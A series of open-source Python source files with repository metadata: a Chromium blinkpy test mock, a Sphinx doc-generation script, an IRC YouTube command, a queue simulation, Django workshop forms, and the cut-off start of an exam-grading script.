"name": "HTML",
"bytes": "41387"
},
{
"name": "HiveQL",
"bytes": "1890736"
},
{
"name": "Java",
"bytes": "4123643"
},
{
"name": "JavaScript",
"bytes": "203741"
},
{
"name": "Makefile",
"bytes": "7776"
},
{
"name": "PLpgSQL",
"bytes": "380679"
},
{
"name": "PowerShell",
"bytes": "3865"
},
{
"name": "Python",
"bytes": "3130521"
},
{
"name": "R",
"bytes": "1186948"
},
{
"name": "Roff",
"bytes": "21950"
},
{
"name": "SQLPL",
"bytes": "9325"
},
{
"name": "Scala",
"bytes": "31707827"
},
{
"name": "Shell",
"bytes": "203944"
},
{
"name": "TSQL",
"bytes": "466993"
},
{
"name": "Thrift",
"bytes": "67584"
},
{
"name": "q",
"bytes": "79845"
}
],
"symlink_target": ""
} |
from blinkpy.common.checkout.git_mock import MockGit
from blinkpy.common.net.results_fetcher_mock import MockTestResultsFetcher
from blinkpy.common.net.web_mock import MockWeb
from blinkpy.common.path_finder import PathFinder
from blinkpy.common.system.system_host_mock import MockSystemHost
# New-style ports need to move down into blinkpy.common.
from blinkpy.web_tests.builder_list import BuilderList
from blinkpy.web_tests.port.factory import PortFactory
from blinkpy.web_tests.port.test import add_unit_tests_to_mock_filesystem
from blinkpy.w3c.wpt_manifest import BASE_MANIFEST_NAME
class MockHost(MockSystemHost):
    """A MockSystemHost extended with blinkpy collaborators for tests.

    Bundles a mock web client, mock git, mock results fetcher, a real
    PortFactory, and a canned BuilderList; the mock filesystem is
    pre-populated with unit-test files and a base WPT manifest.
    """

    def __init__(self,
                 log_executive=False,
                 web=None,
                 git=None,
                 os_name=None,
                 os_version=None,
                 time_return_val=123):
        super(MockHost, self).__init__(
            log_executive=log_executive,
            os_name=os_name,
            os_version=os_version,
            time_return_val=time_return_val)

        add_unit_tests_to_mock_filesystem(self.filesystem)
        self._add_base_manifest_to_mock_filesystem(self.filesystem)
        self.web = web or MockWeb()
        self._git = git  # lazily replaced by a MockGit in git() if None
        self.results_fetcher = MockTestResultsFetcher()

        # Note: We're using a real PortFactory here. Tests which don't wish to depend
        # on the list of known ports should override this with a MockPortFactory.
        self.port_factory = PortFactory(self)

        # Canned set of builders covering CI and try bots on each platform.
        self.builders = BuilderList({
            'Fake Test Win10': {
                'port_name': 'win-win10',
                'specifiers': ['Win10', 'Release']
            },
            'Fake Test Linux': {
                'port_name': 'linux-trusty',
                'specifiers': ['Trusty', 'Release']
            },
            'Fake Test Linux (dbg)': {
                'port_name': 'linux-trusty',
                'specifiers': ['Trusty', 'Debug']
            },
            'Fake Test Mac10.12': {
                'port_name': 'mac-mac10.12',
                'specifiers': ['Mac10.12', 'Release'],
                'is_try_builder': True,
            },
            'fake_blink_try_linux': {
                'port_name': 'linux-trusty',
                'specifiers': ['Trusty', 'Release'],
                'is_try_builder': True,
            },
            'fake_blink_try_win': {
                'port_name': 'win-win10',
                'specifiers': ['Win10', 'Release'],
                'is_try_builder': True,
            },
            'android_blink_rel': {
                'bucket': 'luci.chromium.android',
                'port_name': 'android-kitkat',
                'specifiers': ['KitKat', 'Release'],
                'is_try_builder': True,
            },
        })

    def git(self, path=None):
        # With an explicit path, always return a fresh MockGit rooted there.
        if path:
            return MockGit(
                cwd=path,
                filesystem=self.filesystem,
                executive=self.executive,
                platform=self.platform)
        if not self._git:
            self._git = MockGit(
                filesystem=self.filesystem,
                executive=self.executive,
                platform=self.platform)
            # Various pieces of code (wrongly) call filesystem.chdir(checkout_root).
            # Making the checkout_root exist in the mock filesystem makes that chdir not raise.
            self.filesystem.maybe_make_directory(self._git.checkout_root)
        return self._git

    def _add_base_manifest_to_mock_filesystem(self, filesystem):
        """Seed the mock filesystem with a minimal WPT base manifest."""
        path_finder = PathFinder(filesystem)
        external_dir = path_finder.path_from_web_tests('external')
        filesystem.maybe_make_directory(filesystem.join(external_dir, 'wpt'))
        manifest_base_path = filesystem.join(external_dir, BASE_MANIFEST_NAME)
        filesystem.files[manifest_base_path] = b'{"manifest": "base"}'
| {
"content_hash": "a7a91be66bb7da6bc88242107ce9f135",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 91,
"avg_line_length": 39.14141414141414,
"alnum_prop": 0.5641290322580645,
"repo_name": "scheib/chromium",
"id": "e81a7ef7b569c763316915733b7dd951e4284792",
"size": "5402",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "third_party/blink/tools/blinkpy/common/host_mock.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""
This script parse a directory tree looking for python modules and packages and
create ReST files appropriately to create code documentation with Sphinx.
It also create a modules index.
"""
import os
import optparse
# automodule options
# Options appended to every generated `.. automodule::` directive.
OPTIONS = ['members',
           'undoc-members',
           # 'inherited-members', # disable because there's a bug in sphinx
           'show-inheritance']
def create_file_name(base, opts):
    """Create the output file path from a base name, destination dir and suffix."""
    file_name = '%s.%s' % (base, opts.suffix)
    return os.path.join(opts.destdir, file_name)
def write_directive(module, package=None):
    """Create the automodule directive (with options) for a module.

    If *package* is given (and truthy), the directive targets the dotted
    `package.module` path; otherwise it targets the bare module name.
    """
    target = '%s.%s' % (package, module) if package else module
    lines = ['.. automodule:: %s\n' % target]
    for option in OPTIONS:
        lines.append('    :%s:\n' % option)
    return ''.join(lines)
def write_heading(module, kind='Module'):
    """Create the page heading for a module/package documentation page."""
    title = module.title()
    heading = title_line(title + ' Documentation', '=')
    heading += 'This page contains the %s %s documentation.\n\n' % (title, kind)
    return heading
def write_sub(module, kind='Module'):
    """Create the module/package subtitle line."""
    return title_line('The :mod:`%s` %s' % (module, kind), '-')
def title_line(title, char):
    """Underline *title* with *char*, matching the title's length, and add a blank line."""
    underline = char * len(title)
    return '%s\n%s\n\n' % (title, underline)
def create_module_file(package, module, opts):
    """Build the ReST text for a single module and write it to disk.

    :param package: name of the package containing the module (or None).
    :param module: the module name.
    :param opts: parsed command-line options (uses destdir, suffix, force, dryrun).
    """
    name = create_file_name(module, opts)
    # Never overwrite an existing file unless --force was given.
    if not opts.force and os.path.isfile(name):
        print('File %s already exists.' % name)
        return
    print('Creating file %s (module).' % name)
    text = write_heading(module)
    text += write_sub(module)
    text += write_directive(module, package)
    # write the file
    if not opts.dryrun:
        # 'with' guarantees the file is closed even if the write fails.
        with open(name, 'w') as fd:
            fd.write(text)
def create_package_file(root, master_package, subroot, py_files, opts, subs=None):
    """Build the ReST text for a package and write it to disk.

    :param root: filesystem path of the package directory.
    :param master_package: name of the top-level package (or None).
    :param subroot: dotted path of this package relative to the top level.
    :param py_files: the Python files contained in this package.
    :param opts: parsed command-line options.
    :param subs: candidate subdirectory names (filtered down to subpackages).
    """
    package = os.path.split(root)[-1].lower()
    name = create_file_name(subroot, opts)
    # Never overwrite an existing file unless --force was given.
    if not opts.force and os.path.isfile(name):
        print('File %s already exists.' % name)
        return
    print('Creating file %s (package).' % name)

    text = write_heading(package, 'Package')

    if subs is None:
        subs = []
    else:
        # keep only the directories that are packages (contain an __init__.py)
        subs = [sub for sub in subs
                if os.path.isfile(os.path.join(root, sub, '__init__.py'))]
    # if there are some package directories, add a TOC for these subpackages
    if subs:
        text += title_line('Subpackages', '-')
        text += '.. toctree::\n\n'
        for sub in subs:
            text += '    %s.%s\n' % (subroot, sub)
        text += '\n'

    # add each of the package's modules
    for py_file in py_files:
        if not check_for_code(os.path.join(root, py_file)):
            # don't build the file if there's no code in it
            continue
        py_file = os.path.splitext(py_file)[0]
        py_path = '%s.%s' % (subroot, py_file)
        kind = 'Module'
        if py_file == '__init__':
            kind = 'Package'
        # conditional expression instead of the fragile `and/or` idiom,
        # which misbehaves when the selected value is falsy
        text += write_sub(package if kind == 'Package' else py_file, kind)
        text += write_directive(subroot if kind == 'Package' else py_path, master_package)
        text += '\n'

    # write the file
    if not opts.dryrun:
        with open(name, 'w') as fd:
            fd.write(text)
def check_for_code(module):
    """
    Check if there's at least one class or one function in the module.

    :param module: path of the Python source file to scan.
    :return: True if a top-level `def ` or `class ` line is found.
    """
    # 'with' closes the file even if iteration raises (the original leaked
    # the handle on error); startswith accepts a tuple of prefixes.
    with open(module, 'r') as fd:
        for line in fd:
            if line.startswith(('def ', 'class ')):
                return True
    return False
def recurse_tree(path, excludes, opts):
    """
    Look for every file in the directory tree and create the corresponding
    ReST files.

    :param path: root directory to scan.
    :param excludes: directories to skip (relative or absolute).
    :param opts: parsed command-line options.
    """
    package_name = None
    # check if the base directory is a package and get its name
    if '__init__.py' in os.listdir(path):
        package_name = os.path.abspath(path).split(os.path.sep)[-1]

    toc = []
    excludes = format_excludes(path, excludes)
    # walk bottom-up so package files see their finished sub-entries
    tree = os.walk(path, False)
    for root, subs, files in tree:
        # keep only the Python script files
        py_files = check_py_file(files)
        # remove hidden ('.') and private ('_') directories
        subs = [sub for sub in subs if sub[0] not in ['.', '_']]
        # check if there are valid files to process
        # TODO: could add check for windows hidden files
        if "/." in root or "/_" in root \
                or not py_files \
                or check_excludes(root, excludes):
            continue
        # dotted path of this directory relative to the scan root
        subroot = root[len(path):].lstrip(os.path.sep).replace(os.path.sep, '.')
        if root == path:
            # we are at the root level so we create only modules
            for py_file in py_files:
                module = os.path.splitext(py_file)[0]
                # add the module if it contains code
                if check_for_code(os.path.join(path, '%s.py' % module)):
                    create_module_file(package_name, module, opts)
                    toc.append(module)
        elif not subs and "__init__.py" in py_files:
            # we are in a package without sub package
            # check if there's only an __init__.py file
            if len(py_files) == 1:
                # check if there's code in the __init__.py file
                if check_for_code(os.path.join(root, '__init__.py')):
                    create_package_file(root, package_name, subroot, py_files, opts=opts)
                    toc.append(subroot)
            else:
                create_package_file(root, package_name, subroot, py_files, opts=opts)
                toc.append(subroot)
        elif "__init__.py" in py_files:
            # we are in package with subpackage(s)
            create_package_file(root, package_name, subroot, py_files, opts, subs)
            toc.append(subroot)

    # create the module's index
    if not opts.notoc:
        modules_toc(toc, opts)
def modules_toc(modules, opts, name='modules'):
    """
    Create the modules index file containing a TOC of all top-level modules.

    :param modules: list of dotted module/package names.
    :param opts: parsed command-line options.
    :param name: base name of the index file.
    """
    fname = create_file_name(name, opts)
    if not opts.force and os.path.exists(fname):
        print('File %s already exists.' % name)
        return
    print("Creating module's index modules.txt.")
    text = write_heading(opts.header, 'Modules')
    text += title_line('Modules:', '-')
    text += '.. toctree::\n'
    text += '    :maxdepth: %s\n\n' % opts.maxdepth
    modules.sort()
    prev_module = ''
    for module in modules:
        # skip submodules: they are reachable from their parent package's page
        if module.startswith(prev_module + '.'):
            continue
        prev_module = module
        text += '    %s\n' % module
    # write the file
    if not opts.dryrun:
        # 'with' guarantees the file is closed even if the write fails.
        with open(fname, 'w') as fd:
            fd.write(text)
def format_excludes(path, excludes):
    """
    Normalize the excluded directory list.

    Relative entries (that are not already under *path*) are joined onto
    *path*; trailing path separators are stripped from every entry.
    """
    formatted = []
    for exclude in excludes:
        if not os.path.isabs(exclude) and exclude[:len(path)] != path:
            exclude = os.path.join(path, exclude)
        # remove trailing slash
        formatted.append(exclude.rstrip(os.path.sep))
    return formatted
def check_excludes(root, excludes):
    """
    Return True if *root* falls under any entry of the exclude list.
    """
    return any(root.startswith(prefix) for prefix in excludes)
def check_py_file(files):
    """
    Return a list with only the python scripts (all other files removed).
    """
    return [name for name in files if os.path.splitext(name)[1] == '.py']
def main():
"""
Parse and check the command line arguments
"""
parser = optparse.OptionParser(usage="""usage: %prog [options] <package path> [exclude paths, ...]
Note: By default this script will not overwrite already created files.""")
parser.add_option("-n", "--doc-header", action="store", dest="header", help="Documentation Header (default=Project)", default="Project")
parser.add_option("-d", "--dest-dir", action="store", dest="destdir", help="Output destination directory", default="")
parser.add_option("-s", "--suffix", action="store", dest="suffix", help="module suffix (default=txt)", default="txt")
parser.add_option("-m", "--maxdepth", action="store", dest="maxdepth", help="Maximum depth of submodules to show in the TOC (default=4)", type="int", default=4)
parser.add_option("-r", "--dry-run", action="store_true", dest="dryrun", help="Run the script without creating the files")
parser.add_option("-f", "--force", action="store_true", dest="force", help="Overwrite all the files")
parser.add_option("-t", "--no-toc", action="store_true", dest="notoc", help="Don't create the table of content file")
(opts, args) = parser.parse_args()
if len(args) < 1:
parser.error("package path is required.")
else:
if os.path.isdir(args[0]):
# check if the output destination is a valid directory
if opts.destdir and os.path.isdir(opts.destdir):
# if there's some exclude arguments, build the list of excludes
excludes = args[1:]
recurse_tree(args[0], excludes, opts)
else:
print '%s is not a valid output destination directory.' % opts.destdir
else:
print '%s is not a valid directory.' % args
if __name__ == '__main__':
main()
| {
"content_hash": "8ddae5aa75e5f0300c0f4f84a9e289f9",
"timestamp": "",
"source": "github",
"line_count": 267,
"max_line_length": 164,
"avg_line_length": 37.951310861423224,
"alnum_prop": 0.5755452481989539,
"repo_name": "pombreda/pyamg",
"id": "7606a403fc1aebaea27365347e5dd7d1023f162b",
"size": "10921",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Docs/sphinxext/generate_modules.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "1112880"
},
{
"name": "CSS",
"bytes": "9832"
},
{
"name": "Makefile",
"bytes": "3249"
},
{
"name": "Matlab",
"bytes": "2742"
},
{
"name": "Python",
"bytes": "1215339"
},
{
"name": "Shell",
"bytes": "558"
},
{
"name": "TeX",
"bytes": "232"
}
],
"symlink_target": ""
} |
import json
import urllib
import datetime
from gdata.youtube import service
from utils.text import style
from commands import Command
class youtube(Command):
    """IRC command: search YouTube for a phrase and reply with the top hit.

    Replies with "title [duration] (url)" for the first result, or a usage /
    no-results message.
    """
    # Usage string shown when the command is invoked with no arguments.
    syntax = "Syntax %s %s" % (
        style.bold("!youtube"),
        style.underline("phrase"))
    def __init__(self, *args, **kwargs):
        # NOTE(review): the early `return self.message(...)` statements return
        # a value from __init__; Python raises TypeError at instantiation
        # unless Command.message returns None — verify against the Command
        # base class.
        Command.__init__(self, *args, **kwargs)
        if not self.args:
            return self.message(self.syntax, self.user)
        query = service.YouTubeVideoQuery()
        # search phrase is the joined command arguments
        query.vq = ' '.join(self.args)
        feed = service.YouTubeService().YouTubeQuery(query)
        if not feed.entry:
            return self.message("No YouTube results for \"%s\"" % query.vq, self.user)
        video = feed.entry[0].media
        title = video.title.text
        duration = datetime.timedelta(seconds=int(video.duration.seconds))
        # strip trailing query parameters from the player URL
        url = video.player.url.split('&')[0]
        self.message("%s [%s] (%s)" % (title, duration, url), self.user)
| {
"content_hash": "e7166fd46e748cf9c6f692220e388d97",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 86,
"avg_line_length": 29.606060606060606,
"alnum_prop": 0.601842374616172,
"repo_name": "ryonsherman/rcbot",
"id": "7edd7f3053af179160b5b856711a652d15a7a26e",
"size": "1001",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "commands/global/youtube.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12217"
}
],
"symlink_target": ""
} |
from queue import PriorityQueue
import math
import random
from app.logic.incoming_event import IncomingEvent
from app.logic.outcoming_event import OutcomingEvent
from app.logic.device import Device
from app.logic.request import Request
class Model:
    """Event-driven queueing simulation: one device served by a priority
    queue of timed events (all state is class-level; use via the static
    methods after calling initialize())."""
    # total simulated time to run, set by initialize()
    work_time = None
    # mean of the exponential inter-arrival interval (seconds)
    interval_time = None
    # PriorityQueue of pending events, ordered by event time
    event_list = None
    # current simulation clock
    model_time = None
    @staticmethod
    def initialize(work_time_value):
        """Reset the model state and seed the first arrival at t=0."""
        Model.work_time = work_time_value
        Model.model_time = 0
        Model.interval_time = 60
        Model.event_list = PriorityQueue()
        Model.add_event(IncomingEvent(0.0))
        Model.device = Device(30, 70)
    @staticmethod
    def start():
        """Main loop: pop events in time order until work_time is reached."""
        while Model.model_time < Model.work_time:
            present_event = Model.get_event()
            Model.model_time = present_event.time
            present_event.handle_self(Model)
    @staticmethod
    def add_event(event):
        # events sort by time inside the PriorityQueue
        Model.event_list.put(event)
    @staticmethod
    def get_event():
        # earliest-time event first
        return Model.event_list.get()
    @staticmethod
    def get_exp_interval():
        # inverse-transform sampling of an exponential distribution
        return (-1) * math.log(1 - random.random()) * Model.interval_time
    @staticmethod
    def handle_incoming_event(time):
        """Schedule the next arrival and enqueue/serve the new request."""
        event_time = time + Model.get_exp_interval()
        Model.add_event(IncomingEvent(event_time))
        current_request_number = Model.device.next_request_number
        request = Request(current_request_number, time)
        # busy device -> queue the request; idle device -> serve immediately
        if Model.device.present_request != None:
            Model.device.add_request(request)
        else:
            Model.process_device(request)
        #log function
        print('[handle an incoming event]\t\t{0} sec.'.format(event_time))
    @staticmethod
    def handle_outcoming_event(time):
        """Free the device; start serving the next queued request, if any."""
        Model.device.present_request = None
        if not Model.device.is_empty_request_queue():
            request = Model.device.remove_request()
            Model.process_device(request)
        else:
            Model.device.present_request = None
        #log function
        print('[handling an outcoming event]\t\t{0} sec.'.format(time))
    @staticmethod
    def process_device(request):
        """Put *request* on the device and schedule its completion event."""
        Model.device.present_request = request
        Model.device.next_request_number += 1
        # NOTE(review): `time` (the device's sampled processing time) is
        # computed but never used — the completion event is scheduled using
        # model_time - request.time instead. Looks like a bug; confirm which
        # duration was intended.
        time = Model.device.get_processing_time()
        total_time = Model.model_time - request.time
        Model.add_event(OutcomingEvent(Model.model_time + total_time))
        #log function
        print('[processing the device]\t\t\trequest #{0}'.format(request.number))
| {
"content_hash": "1eaa2211561d38e3c8e5fdc7a72f28b5",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 81,
"avg_line_length": 32.41558441558441,
"alnum_prop": 0.6430288461538461,
"repo_name": "ordinary-developer/modelling_1",
"id": "ab2499603edcb5960a519e79b246a3d9284dfb8f",
"size": "2496",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/logic/model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8728"
}
],
"symlink_target": ""
} |
from django import forms
from django.forms import HiddenInput
from django.forms import formset_factory
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Div, HTML, Submit
from crispy_forms.bootstrap import FormActions
from selectable import forms as selectable
from workshops.models import Skill, Airport, Event, Task, Award, Person
from workshops import lookups
INSTRUCTOR_SEARCH_LEN = 10 # how many instrutors to return from a search by default
AUTOCOMPLETE_HELP_TEXT = (
"Autocomplete field; type characters to view available options, "
"then select desired item from list."
)
DATE_HELP_TEXT = "Select date using widget, or enter in YYYY-MM-DD format."
class BootstrapHelper(FormHelper):
    """Crispy-forms helper rendering a horizontal Bootstrap form with a
    'Submit' button appended."""
    form_class = 'form-horizontal'
    label_class = 'col-lg-2'
    field_class = 'col-lg-8'
    def __init__(self, form=None):
        super().__init__(form)
        # ARIA role for accessibility
        self.attrs['role'] = 'form'
        self.inputs.append(Submit('submit', 'Submit'))
class BootstrapHelperWithAdd(BootstrapHelper):
    """Same as BootstrapHelper but the button is labelled 'Add'."""
    def __init__(self, form=None):
        super().__init__(form)
        # replace the 'Submit' button appended by the parent class
        self.inputs[-1] = Submit('submit', 'Add')
class BootstrapHelperFilter(FormHelper):
    """Helper for filter forms: submits via GET so filters land in the URL."""
    form_method = 'get'
    def __init__(self, form=None):
        super().__init__(form)
        self.attrs['role'] = 'form'
        self.inputs.append(Submit('', 'Submit'))
# Shared, stateless helper instances reused by the views/templates.
bootstrap_helper = BootstrapHelper()
bootstrap_helper_with_add = BootstrapHelperWithAdd()
bootstrap_helper_filter = BootstrapHelperFilter()
class InstructorsForm(forms.Form):
    '''Represent instructor matching form.

    Location is given either as an airport OR as a latitude/longitude pair
    (enforced in clean()); one checkbox per Skill is added dynamically.
    '''
    wanted = forms.IntegerField(label='Number Wanted',
                                initial=INSTRUCTOR_SEARCH_LEN,
                                min_value=1)
    latitude = forms.FloatField(label='Latitude',
                                min_value=-90.0,
                                max_value=90.0,
                                required=False)
    longitude = forms.FloatField(label='Longitude',
                                 min_value=-180.0,
                                 max_value=180.0,
                                 required=False)
    airport = selectable.AutoCompleteSelectField(
        lookup_class=lookups.AirportLookup,
        label='Airport',
        required=False,
        widget=selectable.AutoComboboxSelectWidget(
            lookup_class=lookups.AirportLookup,
        ),
    )
    def __init__(self, *args, **kwargs):
        '''Build checkboxes for skills dynamically.'''
        super(InstructorsForm, self).__init__(*args, **kwargs)
        self.helper = FormHelper(self)
        self.helper.form_class = 'form-inline'
        self.helper.layout = Layout(
            'wanted',
            Div(
                Div(
                    'latitude',
                    'longitude',
                    css_class='col-sm-6'
                ),
                Div(
                    HTML('<br><strong>OR</strong>'),
                    css_class='col-sm-2',
                ),
                Div(
                    'airport',
                    css_class='col-sm-4'
                ),
                css_class='row panel panel-default panel-body',
            ),
            HTML('<label class="control-label">Skills</label>'),
            FormActions(
                Submit('submit', 'Submit'),
            ),
        )
        # One BooleanField per Skill; hits the DB at form construction time.
        # NOTE(review): inserting each name at index 3 places skills after the
        # 'Skills' label but in reverse query order — confirm that is intended.
        skills = Skill.objects.all()
        for s in skills:
            self.fields[s.name] = forms.BooleanField(label=s.name, required=False)
            self.helper.layout.insert(3, s.name)
    def clean(self):
        # Enforce the airport XOR latitude/longitude contract.
        cleaned_data = super(InstructorsForm, self).clean()
        airport = cleaned_data.get('airport')
        lat = cleaned_data.get('latitude')
        long = cleaned_data.get('longitude')  # NOTE: shadows the py2 builtin `long`
        if airport is None:
            if lat is None or long is None:
                raise forms.ValidationError(
                    'Must specify either an airport code or latitude/longitude')
        else:
            if lat is not None or long is not None:
                raise forms.ValidationError(
                    'Cannot specify both an airport code and a '
                    'latitude/longitude. Pick one or the other')
            # derive the coordinates from the chosen airport
            cleaned_data['latitude'] = airport.latitude
            cleaned_data['longitude'] = airport.longitude
        return cleaned_data
class PersonBulkAddForm(forms.Form):
    '''Represent CSV upload form for bulk adding people.'''
    # CSV file, one person per row.
    file = forms.FileField()
class SearchForm(forms.Form):
    '''Represent general searching form.

    The boolean flags select which entity types the term is matched against;
    all default to enabled.
    '''
    term = forms.CharField(label='term',
                           max_length=100)
    in_sites = forms.BooleanField(label='in sites',
                                  required=False,
                                  initial=True)
    in_events = forms.BooleanField(label='in events',
                                   required=False,
                                   initial=True)
    in_persons = forms.BooleanField(label='in persons',
                                    required=False,
                                    initial=True)
    in_airports = forms.BooleanField(label='in airports',
                                     required=False,
                                     initial=True)
class DebriefForm(forms.Form):
    '''Represent general debrief form.

    Both dates are entered in ISO YYYY-MM-DD format and define the reporting
    period (begin_date .. end_date).
    '''
    begin_date = forms.DateField(
        label='Begin date as YYYY-MM-DD',
        input_formats=['%Y-%m-%d', ]
    )
    end_date = forms.DateField(
        # bug fix: label previously read 'YYYY-MD-DD'
        label='End date as YYYY-MM-DD',
        input_formats=['%Y-%m-%d', ]
    )
class EventForm(forms.ModelForm):
    """ModelForm for Event with autocompleting site/organizer fields."""
    site = selectable.AutoCompleteSelectField(
        lookup_class=lookups.SiteLookup,
        label='Site',
        required=True,
        help_text=AUTOCOMPLETE_HELP_TEXT,
        widget=selectable.AutoComboboxSelectWidget,
    )
    organizer = selectable.AutoCompleteSelectField(
        lookup_class=lookups.SiteLookup,
        label='Organizer',
        required=False,
        help_text=AUTOCOMPLETE_HELP_TEXT,
        widget=selectable.AutoComboboxSelectWidget,
    )
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # date pickers need an input-format hint
        self.fields['start'].help_text = DATE_HELP_TEXT
        self.fields['end'].help_text = DATE_HELP_TEXT
    def clean_slug(self):
        # Ensure slug is not an integer value for Event.get_by_ident
        # (integer idents are interpreted as primary keys there)
        data = self.cleaned_data['slug']
        try:
            int(data)
        except ValueError:
            pass
        else:
            raise forms.ValidationError("Slug must not be an integer-value.")
        return data
    class Meta:
        model = Event
        # reorder fields, don't display 'deleted' field
        fields = ('slug', 'start', 'end', 'site', 'organizer',
                  'tags', 'url', 'reg_key', 'admin_fee', 'invoiced',
                  'attendance', 'notes')
class TaskForm(forms.ModelForm):
    """ModelForm for Task used on an event page: the event is fixed (hidden)
    and the person is chosen via autocomplete."""
    person = selectable.AutoCompleteSelectField(
        lookup_class=lookups.PersonLookup,
        label='Person',
        required=True,
        help_text=AUTOCOMPLETE_HELP_TEXT,
        widget=selectable.AutoComboboxSelectWidget,
    )
    class Meta:
        model = Task
        fields = '__all__'
        # the owning event is supplied by the view, not the user
        widgets = {'event': HiddenInput}
class TaskFullForm(TaskForm):
    """TaskForm variant where the event is also user-selectable
    (autocomplete) instead of hidden."""
    event = selectable.AutoCompleteSelectField(
        lookup_class=lookups.EventLookup,
        label='Event',
        required=True,
        help_text=AUTOCOMPLETE_HELP_TEXT,
        widget=selectable.AutoComboboxSelectWidget,
    )
    class Meta:
        model = Task
        fields = '__all__'
class PersonForm(forms.ModelForm):
    """ModelForm for Person profile data (credentials/permissions are edited
    via PersonPermissionsForm instead)."""
    airport = selectable.AutoCompleteSelectField(
        lookup_class=lookups.AirportLookup,
        label='Airport',
        required=False,
        help_text=AUTOCOMPLETE_HELP_TEXT,
        widget=selectable.AutoComboboxSelectWidget,
    )
    class Meta:
        model = Person
        # don't display the 'password', 'user_permissions',
        # 'groups' or 'is_superuser' fields
        # + reorder fields
        fields = ['username', 'personal', 'middle', 'family', 'may_contact',
                  'email', 'gender', 'airport', 'github', 'twitter', 'url',
                  'notes', ]
class PersonPermissionsForm(forms.ModelForm):
    """ModelForm exposing only a Person's authorization fields."""
    class Meta:
        model = Person
        # only display 'user_permissions', 'groups' and `is_superuser` fields
        fields = [
            'is_superuser',
            'user_permissions',
            'groups',
        ]
class BadgeAwardForm(forms.ModelForm):
    """ModelForm for awarding a fixed badge (hidden) to a chosen person,
    optionally tied to an event."""
    person = selectable.AutoCompleteSelectField(
        lookup_class=lookups.PersonLookup,
        label='Person',
        required=True,
        help_text=AUTOCOMPLETE_HELP_TEXT,
        widget=selectable.AutoComboboxSelectWidget,
    )
    event = selectable.AutoCompleteSelectField(
        lookup_class=lookups.EventLookup,
        label='Event',
        required=False,
        help_text=AUTOCOMPLETE_HELP_TEXT,
        widget=selectable.AutoComboboxSelectWidget,
    )
    class Meta:
        model = Award
        fields = '__all__'
        # the badge is fixed by the page the form is shown on
        widgets = {'badge': HiddenInput}
class PersonAwardForm(forms.ModelForm):
    """ModelForm for adding an award to a fixed person (hidden), optionally
    tied to an event."""
    event = selectable.AutoCompleteSelectField(
        lookup_class=lookups.EventLookup,
        label='Event',
        required=False,
        help_text=AUTOCOMPLETE_HELP_TEXT,
        widget=selectable.AutoComboboxSelectWidget,
    )
    class Meta:
        model = Award
        fields = '__all__'
        # the recipient is fixed by the page the form is shown on
        widgets = {'person': HiddenInput}
| {
"content_hash": "ac7a7c98eaf5206f7bbc804a74909db2",
"timestamp": "",
"source": "github",
"line_count": 312,
"max_line_length": 85,
"avg_line_length": 30.57051282051282,
"alnum_prop": 0.5712937722793039,
"repo_name": "shapiromatron/amy",
"id": "f8e25e295d3dadde78417623a85b7471df1abb30",
"size": "9538",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "workshops/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1332"
},
{
"name": "HTML",
"bytes": "43835"
},
{
"name": "Makefile",
"bytes": "2641"
},
{
"name": "PLpgSQL",
"bytes": "3667538"
},
{
"name": "Python",
"bytes": "222271"
},
{
"name": "Shell",
"bytes": "373"
}
],
"symlink_target": ""
} |
import json
import os
import tempfile
from subprocess import Popen, PIPE, STDOUT
from subprocess import TimeoutExpired

from file_preprocessor import FileView
def franken_interpreter(file_view, user_solutions, file_pointer):
    """Copy *file_view* into *file_pointer*, replacing the body of every
    '@@ begin question <id>' ... '@@ end question' region whose id appears in
    *user_solutions* with the user's answer text."""
    begin_marker = '@@ begin question '
    end_marker = '@@ end question'
    inside_question = False
    for entry in file_view.line_datas:
        text = entry['text']
        if 'macro' in entry:
            if text.startswith(begin_marker):
                # question id is the rest of the line minus the newline
                question_id = text[len(begin_marker):-1]
                if question_id in user_solutions:
                    inside_question = True
                    file_pointer.write(user_solutions[question_id])
            if text.startswith(end_marker):
                inside_question = False
        elif not inside_question:
            file_pointer.write(text)
def run_user_solution(user_solutions, command, exam_config, stdin_input):
    """Materialize the exam files (with *user_solutions* spliced in) into a
    temp directory, run *command* there with *stdin_input* on stdin, and
    return the combined stdout/stderr bytes.

    Fixes vs. original:
      * catches subprocess.TimeoutExpired (communicate() never raises the
        builtin TimeoutError, so the old handler was dead and the process
        leaked on timeout);
      * builds paths with os.path.join instead of hard-coded "\\\\";
      * restores the original working directory even if the run fails.
    """
    base_dir = os.getcwd()
    with tempfile.TemporaryDirectory() as compiler_folder:
        for file_name in exam_config['file_list']:
            sub_dir = os.path.dirname(file_name)
            if sub_dir:
                os.makedirs(os.path.join(compiler_folder, sub_dir),
                            exist_ok=True)
            target = os.path.join(compiler_folder, file_name)
            with open(target, mode="w") as compiler_input:
                with open(file_name) as code_file:
                    franken_interpreter(FileView(code_file),
                                        user_solutions, compiler_input)
        try:
            os.chdir(compiler_folder)
            p = Popen(command, stdout=PIPE, stdin=PIPE, stderr=STDOUT)
            try:
                stdout = p.communicate(
                    input=stdin_input.encode('utf-8'), timeout=10)[0]
            except TimeoutExpired:
                # kill the runaway process and collect whatever it produced
                p.kill()
                stdout = p.communicate()[0]
        finally:
            os.chdir(base_dir)
    return stdout
def evaluate_user_solution(user_solutions, exam_config):
    """Run every configured test case with and without the user's answers
    and score each question.

    Returns a dict mapping question name -> record with accumulated
    test/question scores and an explanatory message.

    Fix vs. original: the pass check compared only the first byte of the
    outputs (``actual[0] == expected[0]``); the complete outputs are now
    compared, and the failure message shows them in full.
    """
    quest_dict = {}
    for test_file in exam_config['test_list']:
        with open(test_file) as test_config:
